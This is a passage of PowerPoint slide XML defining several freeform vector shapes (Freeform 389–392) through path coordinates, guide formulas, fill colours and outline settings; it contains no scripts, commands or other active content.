                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="00CC00"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36256" name="Freeform 389"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3550" y="2518"/>
                <a:ext cx="84" cy="67"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 84"/>
                  <a:gd name="T1" fmla="*/ 27 h 67"/>
                  <a:gd name="T2" fmla="*/ 3 w 84"/>
                  <a:gd name="T3" fmla="*/ 27 h 67"/>
                  <a:gd name="T4" fmla="*/ 3 w 84"/>
                  <a:gd name="T5" fmla="*/ 29 h 67"/>
                  <a:gd name="T6" fmla="*/ 5 w 84"/>
                  <a:gd name="T7" fmla="*/ 30 h 67"/>
                  <a:gd name="T8" fmla="*/ 6 w 84"/>
                  <a:gd name="T9" fmla="*/ 31 h 67"/>
                  <a:gd name="T10" fmla="*/ 8 w 84"/>
                  <a:gd name="T11" fmla="*/ 30 h 67"/>
                  <a:gd name="T12" fmla="*/ 7 w 84"/>
                  <a:gd name="T13" fmla="*/ 34 h 67"/>
                  <a:gd name="T14" fmla="*/ 10 w 84"/>
                  <a:gd name="T15" fmla="*/ 34 h 67"/>
                  <a:gd name="T16" fmla="*/ 13 w 84"/>
                  <a:gd name="T17" fmla="*/ 35 h 67"/>
                  <a:gd name="T18" fmla="*/ 18 w 84"/>
                  <a:gd name="T19" fmla="*/ 34 h 67"/>
                  <a:gd name="T20" fmla="*/ 19 w 84"/>
                  <a:gd name="T21" fmla="*/ 32 h 67"/>
                  <a:gd name="T22" fmla="*/ 20 w 84"/>
                  <a:gd name="T23" fmla="*/ 32 h 67"/>
                  <a:gd name="T24" fmla="*/ 22 w 84"/>
                  <a:gd name="T25" fmla="*/ 33 h 67"/>
                  <a:gd name="T26" fmla="*/ 25 w 84"/>
                  <a:gd name="T27" fmla="*/ 33 h 67"/>
                  <a:gd name="T28" fmla="*/ 29 w 84"/>
                  <a:gd name="T29" fmla="*/ 33 h 67"/>
                  <a:gd name="T30" fmla="*/ 31 w 84"/>
                  <a:gd name="T31" fmla="*/ 33 h 67"/>
                  <a:gd name="T32" fmla="*/ 31 w 84"/>
                  <a:gd name="T33" fmla="*/ 32 h 67"/>
                  <a:gd name="T34" fmla="*/ 41 w 84"/>
                  <a:gd name="T35" fmla="*/ 34 h 67"/>
                  <a:gd name="T36" fmla="*/ 46 w 84"/>
                  <a:gd name="T37" fmla="*/ 33 h 67"/>
                  <a:gd name="T38" fmla="*/ 46 w 84"/>
                  <a:gd name="T39" fmla="*/ 31 h 67"/>
                  <a:gd name="T40" fmla="*/ 48 w 84"/>
                  <a:gd name="T41" fmla="*/ 32 h 67"/>
                  <a:gd name="T42" fmla="*/ 50 w 84"/>
                  <a:gd name="T43" fmla="*/ 32 h 67"/>
                  <a:gd name="T44" fmla="*/ 52 w 84"/>
                  <a:gd name="T45" fmla="*/ 31 h 67"/>
                  <a:gd name="T46" fmla="*/ 54 w 84"/>
                  <a:gd name="T47" fmla="*/ 28 h 67"/>
                  <a:gd name="T48" fmla="*/ 55 w 84"/>
                  <a:gd name="T49" fmla="*/ 27 h 67"/>
                  <a:gd name="T50" fmla="*/ 57 w 84"/>
                  <a:gd name="T51" fmla="*/ 23 h 67"/>
                  <a:gd name="T52" fmla="*/ 58 w 84"/>
                  <a:gd name="T53" fmla="*/ 21 h 67"/>
                  <a:gd name="T54" fmla="*/ 63 w 84"/>
                  <a:gd name="T55" fmla="*/ 16 h 67"/>
                  <a:gd name="T56" fmla="*/ 69 w 84"/>
                  <a:gd name="T57" fmla="*/ 9 h 67"/>
                  <a:gd name="T58" fmla="*/ 70 w 84"/>
                  <a:gd name="T59" fmla="*/ 10 h 67"/>
                  <a:gd name="T60" fmla="*/ 72 w 84"/>
                  <a:gd name="T61" fmla="*/ 9 h 67"/>
                  <a:gd name="T62" fmla="*/ 78 w 84"/>
                  <a:gd name="T63" fmla="*/ 3 h 67"/>
                  <a:gd name="T64" fmla="*/ 80 w 84"/>
                  <a:gd name="T65" fmla="*/ 0 h 67"/>
                  <a:gd name="T66" fmla="*/ 81 w 84"/>
                  <a:gd name="T67" fmla="*/ 1 h 67"/>
                  <a:gd name="T68" fmla="*/ 79 w 84"/>
                  <a:gd name="T69" fmla="*/ 4 h 67"/>
                  <a:gd name="T70" fmla="*/ 79 w 84"/>
                  <a:gd name="T71" fmla="*/ 6 h 67"/>
                  <a:gd name="T72" fmla="*/ 79 w 84"/>
                  <a:gd name="T73" fmla="*/ 8 h 67"/>
                  <a:gd name="T74" fmla="*/ 79 w 84"/>
                  <a:gd name="T75" fmla="*/ 8 h 67"/>
                  <a:gd name="T76" fmla="*/ 80 w 84"/>
                  <a:gd name="T77" fmla="*/ 8 h 67"/>
                  <a:gd name="T78" fmla="*/ 83 w 84"/>
                  <a:gd name="T79" fmla="*/ 9 h 67"/>
                  <a:gd name="T80" fmla="*/ 84 w 84"/>
                  <a:gd name="T81" fmla="*/ 11 h 67"/>
                  <a:gd name="T82" fmla="*/ 84 w 84"/>
                  <a:gd name="T83" fmla="*/ 15 h 67"/>
                  <a:gd name="T84" fmla="*/ 84 w 84"/>
                  <a:gd name="T85" fmla="*/ 18 h 67"/>
                  <a:gd name="T86" fmla="*/ 81 w 84"/>
                  <a:gd name="T87" fmla="*/ 18 h 67"/>
                  <a:gd name="T88" fmla="*/ 78 w 84"/>
                  <a:gd name="T89" fmla="*/ 17 h 67"/>
                  <a:gd name="T90" fmla="*/ 77 w 84"/>
                  <a:gd name="T91" fmla="*/ 21 h 67"/>
                  <a:gd name="T92" fmla="*/ 78 w 84"/>
                  <a:gd name="T93" fmla="*/ 31 h 67"/>
                  <a:gd name="T94" fmla="*/ 76 w 84"/>
                  <a:gd name="T95" fmla="*/ 34 h 67"/>
                  <a:gd name="T96" fmla="*/ 72 w 84"/>
                  <a:gd name="T97" fmla="*/ 38 h 67"/>
                  <a:gd name="T98" fmla="*/ 72 w 84"/>
                  <a:gd name="T99" fmla="*/ 46 h 67"/>
                  <a:gd name="T100" fmla="*/ 72 w 84"/>
                  <a:gd name="T101" fmla="*/ 62 h 67"/>
                  <a:gd name="T102" fmla="*/ 73 w 84"/>
                  <a:gd name="T103" fmla="*/ 63 h 67"/>
                  <a:gd name="T104" fmla="*/ 72 w 84"/>
                  <a:gd name="T105" fmla="*/ 64 h 67"/>
                  <a:gd name="T106" fmla="*/ 68 w 84"/>
                  <a:gd name="T107" fmla="*/ 67 h 67"/>
                  <a:gd name="T108" fmla="*/ 62 w 84"/>
                  <a:gd name="T109" fmla="*/ 66 h 67"/>
                  <a:gd name="T110" fmla="*/ 38 w 84"/>
                  <a:gd name="T111" fmla="*/ 63 h 67"/>
                  <a:gd name="T112" fmla="*/ 13 w 84"/>
                  <a:gd name="T113" fmla="*/ 60 h 67"/>
                  <a:gd name="T114" fmla="*/ 11 w 84"/>
                  <a:gd name="T115" fmla="*/ 53 h 67"/>
                  <a:gd name="T116" fmla="*/ 7 w 84"/>
                  <a:gd name="T117" fmla="*/ 44 h 67"/>
                  <a:gd name="T118" fmla="*/ 0 w 84"/>
                  <a:gd name="T119" fmla="*/ 27 h 67"/>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84"/>
                  <a:gd name="T181" fmla="*/ 0 h 67"/>
                  <a:gd name="T182" fmla="*/ 84 w 84"/>
                  <a:gd name="T183" fmla="*/ 67 h 67"/>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84" h="67">
                    <a:moveTo>
                      <a:pt x="0" y="27"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="27"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36257" name="Freeform 390"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3169" y="3419"/>
                <a:ext cx="37" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 37"/>
                  <a:gd name="T1" fmla="*/ 37 h 37"/>
                  <a:gd name="T2" fmla="*/ 7 w 37"/>
                  <a:gd name="T3" fmla="*/ 33 h 37"/>
                  <a:gd name="T4" fmla="*/ 5 w 37"/>
                  <a:gd name="T5" fmla="*/ 30 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 37"/>
                  <a:gd name="T7" fmla="*/ 23 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 37"/>
                  <a:gd name="T9" fmla="*/ 19 h 37"/>
                  <a:gd name="T10" fmla="*/ 4 w 37"/>
                  <a:gd name="T11" fmla="*/ 14 h 37"/>
                  <a:gd name="T12" fmla="*/ 6 w 37"/>
                  <a:gd name="T13" fmla="*/ 11 h 37"/>
                  <a:gd name="T14" fmla="*/ 10 w 37"/>
                  <a:gd name="T15" fmla="*/ 6 h 37"/>
                  <a:gd name="T16" fmla="*/ 15 w 37"/>
                  <a:gd name="T17" fmla="*/ 3 h 37"/>
                  <a:gd name="T18" fmla="*/ 22 w 37"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 24 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 27 w 37"/>
                  <a:gd name="T23" fmla="*/ 2 h 37"/>
                  <a:gd name="T24" fmla="*/ 29 w 37"/>
                  <a:gd name="T25" fmla="*/ 5 h 37"/>
                  <a:gd name="T26" fmla="*/ 36 w 37"/>
                  <a:gd name="T27" fmla="*/ 11 h 37"/>
                  <a:gd name="T28" fmla="*/ 37 w 37"/>
                  <a:gd name="T29" fmla="*/ 13 h 37"/>
                  <a:gd name="T30" fmla="*/ 36 w 37"/>
                  <a:gd name="T31" fmla="*/ 14 h 37"/>
                  <a:gd name="T32" fmla="*/ 34 w 37"/>
                  <a:gd name="T33" fmla="*/ 17 h 37"/>
                  <a:gd name="T34" fmla="*/ 30 w 37"/>
                  <a:gd name="T35" fmla="*/ 25 h 37"/>
                  <a:gd name="T36" fmla="*/ 28 w 37"/>
                  <a:gd name="T37" fmla="*/ 27 h 37"/>
                  <a:gd name="T38" fmla="*/ 21 w 37"/>
                  <a:gd name="T39" fmla="*/ 30 h 37"/>
                  <a:gd name="T40" fmla="*/ 16 w 37"/>
                  <a:gd name="T41" fmla="*/ 32 h 37"/>
                  <a:gd name="T42" fmla="*/ 15 w 37"/>
                  <a:gd name="T43" fmla="*/ 37 h 37"/>
                  <a:gd name="T44" fmla="*/ 12 w 37"/>
                  <a:gd name="T45" fmla="*/ 37 h 3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37"/>
                  <a:gd name="T70" fmla="*/ 0 h 37"/>
                  <a:gd name="T71" fmla="*/ 37 w 37"/>
                  <a:gd name="T72" fmla="*/ 37 h 37"/>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37" h="37">
                    <a:moveTo>
                      <a:pt x="12" y="37"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="37"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36258" name="Freeform 391"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3169" y="3419"/>
                <a:ext cx="37" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 12 w 37"/>
                  <a:gd name="T1" fmla="*/ 37 h 37"/>
                  <a:gd name="T2" fmla="*/ 7 w 37"/>
                  <a:gd name="T3" fmla="*/ 33 h 37"/>
                  <a:gd name="T4" fmla="*/ 5 w 37"/>
                  <a:gd name="T5" fmla="*/ 30 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 37"/>
                  <a:gd name="T7" fmla="*/ 23 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 37"/>
                  <a:gd name="T9" fmla="*/ 19 h 37"/>
                  <a:gd name="T10" fmla="*/ 4 w 37"/>
                  <a:gd name="T11" fmla="*/ 14 h 37"/>
                  <a:gd name="T12" fmla="*/ 6 w 37"/>
                  <a:gd name="T13" fmla="*/ 11 h 37"/>
                  <a:gd name="T14" fmla="*/ 10 w 37"/>
                  <a:gd name="T15" fmla="*/ 6 h 37"/>
                  <a:gd name="T16" fmla="*/ 15 w 37"/>
                  <a:gd name="T17" fmla="*/ 3 h 37"/>
                  <a:gd name="T18" fmla="*/ 22 w 37"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 24 w 37"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 27 w 37"/>
                  <a:gd name="T23" fmla="*/ 2 h 37"/>
                  <a:gd name="T24" fmla="*/ 29 w 37"/>
                  <a:gd name="T25" fmla="*/ 5 h 37"/>
                  <a:gd name="T26" fmla="*/ 36 w 37"/>
                  <a:gd name="T27" fmla="*/ 11 h 37"/>
                  <a:gd name="T28" fmla="*/ 37 w 37"/>
                  <a:gd name="T29" fmla="*/ 13 h 37"/>
                  <a:gd name="T30" fmla="*/ 36 w 37"/>
                  <a:gd name="T31" fmla="*/ 14 h 37"/>
                  <a:gd name="T32" fmla="*/ 34 w 37"/>
                  <a:gd name="T33" fmla="*/ 17 h 37"/>
                  <a:gd name="T34" fmla="*/ 30 w 37"/>
                  <a:gd name="T35" fmla="*/ 25 h 37"/>
                  <a:gd name="T36" fmla="*/ 28 w 37"/>
                  <a:gd name="T37" fmla="*/ 27 h 37"/>
                  <a:gd name="T38" fmla="*/ 21 w 37"/>
                  <a:gd name="T39" fmla="*/ 30 h 37"/>
                  <a:gd name="T40" fmla="*/ 16 w 37"/>
                  <a:gd name="T41" fmla="*/ 32 h 37"/>
                  <a:gd name="T42" fmla="*/ 15 w 37"/>
                  <a:gd name="T43" fmla="*/ 37 h 37"/>
                  <a:gd name="T44" fmla="*/ 12 w 37"/>
                  <a:gd name="T45" fmla="*/ 37 h 3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37"/>
                  <a:gd name="T70" fmla="*/ 0 h 37"/>
                  <a:gd name="T71" fmla="*/ 37 w 37"/>
                  <a:gd name="T72" fmla="*/ 37 h 37"/>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37" h="37">
                    <a:moveTo>
                      <a:pt x="12" y="37"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="37"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36259" name="Freeform 392"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3228" y="3367"/>
                <a:ext cx="22" cy="29"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 19 w 22"/>
                  <a:gd name="T1" fmla="*/ 5 h 29"/>
                  <a:gd name="T2" fmla="*/ 20 w 22"/>
                  <a:gd name="T3" fmla="*/ 7 h 29"/>
                  <a:gd name="T4" fmla="*/ 19 w 22"/>
                  <a:gd name="T5" fmla="*/ 11 h 29"/>
                  <a:gd name="T6" fmla="*/ 21 w 22"/>
                  <a:gd name="T7" fmla="*/ 18 h 29"/>
                  <a:gd name="T8" fmla="*/ 22 w 22"/>
                  <a:gd name="T9" fmla="*/ 21 h 29"/>
                  <a:gd name="T10" fmla="*/ 21 w 22"/>
                  <a:gd name="T11" fmla="*/ 21 h 29"/>
                  <a:gd name="T12" fmla="*/ 18 w 22"/>
                  <a:gd name="T13" fmla="*/ 23 h 29"/>
                  <a:gd name="T14" fmla="*/ 18 w 22"/>
                  <a:gd name="T15" fmla="*/ 24 h 29"/>
                  <a:gd name="T16" fmla="*/ 17 w 22"/>
                  <a:gd name="T17" fmla="*/ 29 h 29"/>
                  <a:gd name="T18" fmla="*/ 13 w 22"/>
                  <a:gd name="T19" fmla="*/ 29 h 29"/>
                  <a:gd name="T20" fmla="*/ 8 w 22"/>
                  <a:gd name="T21" fmla="*/ 28 h 29"/>
                  <a:gd name="T22" fmla="*/ 5 w 22"/>
                  <a:gd name="T23" fmla="*/ 26 h 29"/>
                  <a:gd name="T24" fmla="*/ 3 w 22"/>
                  <a:gd name="T25" fmla="*/ 22 h 29"/>
                  <a:gd name="T26" fmla="*/ 0 w 22"/>
                  <a:gd name="T27" fmla="*/ 16 h 29"/>
                  <a:gd name="T28" fmla="*/ 0 w 22"/>
                  <a:gd name="T29" fmla="*/ 14 h 29"/>
                  <a:gd name="T30" fmla="*/ 2 w 22"/>
                  <a:gd name="T31" fmla="*/ 9 h 29"/>
                  <a:gd name="T32" fmla="*/ 7 w 22"/>
                  <a:gd name="T33" fmla="*/ 2 h 29"/>
                  <a:gd name="T34" fmla="*/ 9 w 22"/>
